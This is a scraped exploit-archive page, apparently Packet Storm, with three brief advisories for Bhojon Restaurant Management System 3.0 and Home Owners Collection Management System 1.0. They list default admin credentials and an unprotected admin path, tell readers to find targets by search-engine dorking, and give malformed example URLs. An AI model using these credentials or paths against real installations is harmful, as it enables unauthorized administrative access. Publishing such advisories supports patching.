    ====================================================================================================================================| # Title     : Bhojon restaurant management system v3.0 Insecure Settings Vulnerability                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.bdtask.com/restaurant-management-system.php#live_demo                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@example.com & pass = 12345[+] https://www/127.0.0.1/gixrestaurantmy/dashboard/autoupdateGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,460)
*   Arbitrary (16,885)
*   BBS (2,859)
*   Bypass (1,867)
*   CGI (1,033)
*   Code Execution (7,823)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,398)
*   DoS (25,094)
*   Encryption (2,389)
*   Exploit (53,232)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (898)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,727)
*   Python (1,646)
*   Remote (31,673)
*   Root (3,638)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,029)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,614)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,004)
*   Web (9,968)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,101)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,815)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,569)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,756)
*   UNIX (9,438)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Bhojon Restaurant Management System 3.0 Insecure Settings

Home Owners Collection Management System version 1.0 suffers from an ignored default credential vulnerability.

**Home Owners Collection Management System 1.0 Insecure Settings**

Posted Aug 16, 2024

Authored by indoushka

Home Owners Collection Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 94fb8d8c82f8132953cb67c97a9b682c8e63a436a475a575173b89ddf54daa9f

Download | Favorite | View

**Home Owners Collection Management System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Home Owners Collection Management System v1.0 Insecure Settings Vulnerability                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,433)
*   Arbitrary (16,884)
*   BBS (2,859)
*   Bypass (1,865)
*   CGI (1,033)
*   Code Execution (7,817)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,088)
*   Encryption (2,389)
*   Exploit (53,217)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (897)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,726)
*   Python (1,642)
*   Remote (31,665)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,028)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,612)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (32,999)
*   Web (9,966)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,100)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,789)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,546)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,754)
*   UNIX (9,437)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Home Owners Collection Management System 1.0 Insecure Settings

Bhojon Restaurant Management System version 3.0 suffers from an insecure direct object reference vulnerability.

**Bhojon Restaurant Management System 3.0 Insecure Direct Object Reference**

Posted Aug 16, 2024

Authored by indoushka

Bhojon Restaurant Management System version 3.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 98c12c7a5556d4399b71f053e8f21eaf5c59e49e15d4bf7f6b1980de56fec3c2

Download | Favorite | View

**Bhojon Restaurant Management System 3.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Bhojon restaurant management system v3.0 IDOR Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.bdtask.com/restaurant-management-system.php#live_demo                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /dashboard/autoupdate[+] https://www/127.0.0.1/gixrestaurantmy/dashboard/autoupdateGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,433)
*   Arbitrary (16,884)
*   BBS (2,859)
*   Bypass (1,865)
*   CGI (1,033)
*   Code Execution (7,817)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,088)
*   Encryption (2,389)
*   Exploit (53,217)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (897)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,726)
*   Python (1,642)
*   Remote (31,665)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,028)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,612)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (32,999)
*   Web (9,966)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,100)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,789)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,546)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,754)
*   UNIX (9,437)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Tag

#ios